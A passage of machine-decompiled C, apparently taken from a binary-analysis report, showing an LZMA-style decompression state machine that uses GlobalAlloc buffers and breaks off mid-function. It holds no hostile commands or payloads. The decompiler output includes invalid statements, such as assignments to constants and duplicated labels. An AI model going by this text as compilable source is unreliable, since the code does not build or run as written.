				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
